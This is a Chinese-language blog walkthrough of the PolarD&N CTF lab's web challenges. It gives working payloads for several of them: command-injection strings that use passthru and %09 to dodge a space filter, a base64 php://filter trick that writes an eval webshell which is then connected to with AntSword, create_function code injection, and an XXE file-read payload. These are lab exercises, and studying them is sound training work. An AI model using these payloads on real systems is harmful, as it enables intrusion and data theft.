首页 > 其他分享 >PolarD&N-CTF靶场web通关记录

PolarD&N-CTF靶场web通关记录

时间:2024-07-15 19:11:27浏览次数:13  
标签:web base64 09 flag PolarD sys CTF php

新人尝试,还请见谅!!!

web简单

swp

进题先扫dirsearch
image
然后发现了一个叫做/.index.php.swp的备份文件。访问/.index.php.swp
image

这时我们需要post一个名为xdmtql的变量,然后这个变量不能是数组。不能与/sys.nb/is正则匹配。但是结果的sys nb要在第一位。
但是结果的sys nb要在第一位。
我尝试了用回车绕过,因为.
有一个特质:

. 匹配除换行符 \n 之外的任何单字符。要匹配 . ,请使用 . 。
* 匹配前面的子表达式零次或多次。要匹配 * 字符,请使用 *。

这就说明,如果换行符应该是不会被检测的。但是还是错的。所以就用回溯绕过法:
image
运行得到
image

简单rce

post传参一个yyds=666,这是不会被检测的。然后再用get传参一个sys。这个sys好多被过滤了。system和popen也被过滤了。可以使用exec或者直接用``反引号进行命令执行。
image

然后空格被过滤了拿%09或者别的${IFS}之类的过去。我们先尝试一下payload:

?sys=passthru( ' ls%09/' );
用passthru执行,%09替换空格

image

?sys=passthru('sort%09/flag');
sort查看flag

image
flag{j6856fd063f0a04874311187da1191h6}

蜜雪冰城吉警店

召唤神龙

seek flag

jwt

login

iphone

浮生日记

$$

爆破

XFF

rce1

GET-POST

被黑掉的站

签到题

签到

session文件包含

Don't touch me

robots

php very nice

ezupload

cookie欺骗

upload

干正则

cool

uploader

覆盖

PHP反序列化初试

机器人

扫扫看

debudao

审计

upload1

web中等

到底给不给flag呢

image

这道题是有关代码审计的,先c=flag然后让flag=c这样被解析之后,就是$c=$flag&$flag=$c,从而达到真正输出flag的作用。而不会用一个变量c把$flag=flag{xxxxxx}给覆盖。那么最后echo出来的就是$flag
?c=flag&flag=c
查看源代码,因为发现有大量“ <br/ >” 阻拦,拉到最底部,
发现flag{7c21614802acfb30b55697b3f5122be1}

image

写shell

image
根据经验这时应该输入一句话木马,但是事实告诉我们没有这么简单

?filename=php://filter/convert.base64-decode/resource=shell.php

name=php**<?=@eval($_POST[1]);?>**
我们应该需要在filename这里面写入一个content以达到获取flag的效果。那么这就应该写入一句话木马,那么前面的exit()该如何越过成了问题。看一下wp,发现可以使用base64解密的方式进行绕过。那么就将命令加密,并且前面加上任意一个字母进行分隔,payload:
?filename=php://filter/convert.base64-decode/resource=shell.php

content=aPD89QGV2YWwoJF9QT1NUWzFdKTs/Pg== 

然后访问/shell.php发现木马被读入,我们用蚁剑连接一下:

image

某函数的复仇

image
由于怎么也想不到是哪个函数,我们直接去看了wp。发现是create_function()这个函数。他会直接执行这个创建的新函数。不过它需要一个闭合和一个注释。所以我们构造payload:

?root=;}system('ca\t /f*');/*
shaw=create_function

image

xxe

先用dir扫一扫

image

发现了/dom.php

image

然后就找到了报错信息,去找了一下xxe漏洞的攻击方式,然后根据wp构造payload:

<?xml version = "1.0" encoding="utf-8"?>
点击查看代码
<!DOCTYPE xxe [
<!ELEMENT name ANY >
 <!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=flagggg.php">
]>
<name>&xxe;</name>

]>
&xxe;

image

base64解码后得到flag。

标签:web,base64,09,flag,PolarD,sys,CTF,php
From: https://www.cnblogs.com/gsxmuzili/p/18303701/lygsx

相关文章

  • thinkPHP+swoole扩展搭建一个websocket连接聊天室(简易版)
    1.服务器搭建好宝塔面板,并开放用于连接websocket的端口:例如9502 2.本地准备好连接的文件,以thinkPHP举例:(1)根目录下的Websocket.php文件(2)前端index入口文件添加test()方法,然后在view目录里添加相应的test.html  test()方法: test.html:  3.打开宝塔面板,放行9502......
  • 从0到1打造一个 WebRTC 应用
    ......
  • BUUCTF-ningen1
    1.由于是jpg后缀,所以先打开详细信息看看里面有没有东西(png后缀的不需要)2.发现没有东西后,将其放在010Editor里面,看看里面有没有隐藏的文件在010Editor里面发现了PK(PK文件是一种压缩文件格式),于是将其选择保存(后缀记得写成.zip)。3.将压缩包保存在电脑后打开发现需要密码,......
  • buuctf-FLAG1
    1.下载后发现是一张图片;按照做题思路首先打开010Editor查看里面有没有东西,这个图片中我没发现什么东西,于是将图片放在Stegsolve.jar中查看看图片没啥问题后,进行数据提取(dataextract),进行预览发现了504b0304,也就是说里面藏了一个压缩包,这个时候进行保存打开后只发现了一......
  • [Web] 接口文档工具: Swagger
    0引言1springboot整合swagger2,并配置密码登录认证依赖引入spring-boot.version:2.3.12.RELEASEswagger.version:1.5.14springfox-swagger2.version:2.8.0<!--swagger|start--><!--springfox-swagger2:内部依赖/自动引入swagger-annotations/swagger......
  • Python Web应用的部署与维护
    PythonWeb应用的部署与维护是一个涉及多个环节和技术的复杂过程,涵盖了从项目准备、服务器配置、代码部署到后期监控与维护的全方位工作。以下是对这一过程的详细阐述。一、Web应用的部署1.项目准备在部署之前,首先需要确保PythonWeb项目已经开发完成,并且经过了充分的测......
  • [MRCTF2020]Ezaudit 1
    信息收集,伪随机数打开之后发现什么按键都没用,直接扫目录得到了两个网址:www.ziplogin.html<?phpheader('Content-type:text/html;charset=utf-8');error_reporting(0);if(isset($_POST['login'])){$username=$_POST['username'];$password=$_POST[&......
  • 在webapi中创建一个jwt token
    1.第一步首先创建一个webapi项目2.安装nuget包: Microsoft.AspNetCore.Authentication.JwtBearer3.,然后再Program.cs文件中添加 4.然后运行起来 5.打开jwt.io网站,解密token 关于:iss,sub,exp,iat,nbf更新信息看下图:  ......
  • javaweb高校宿舍管理系统|寝室管理[包运行成功+永久免费答疑辅导
    项目功能简介:本项目含代码详细讲解视频,手把手带同学们敲代码从0到1完成项目详细教程学习地址:https://www.bilibili.com/video/BV1V7411M7Et《基于javaweb实现的高校宿舍管理系统》该项目含有源码、文档、答辩ppt、开题报告、代码详细讲解教程等资料、配套开发软件、软件安......
  • webrtc-streamer实时播放监控
    公司要做web端监控实时播放,经过调研,webrtc-streamer的方式对前后端项目侵入最少,且没有延迟卡钝的现象。一、准备工作一个摄像头,摄像头对应的rtsp流链接,一台电脑,一个vue项目。二、Webrtc-streamer安装及启动教程 1、下载安装包下载地址:https://github.com/m......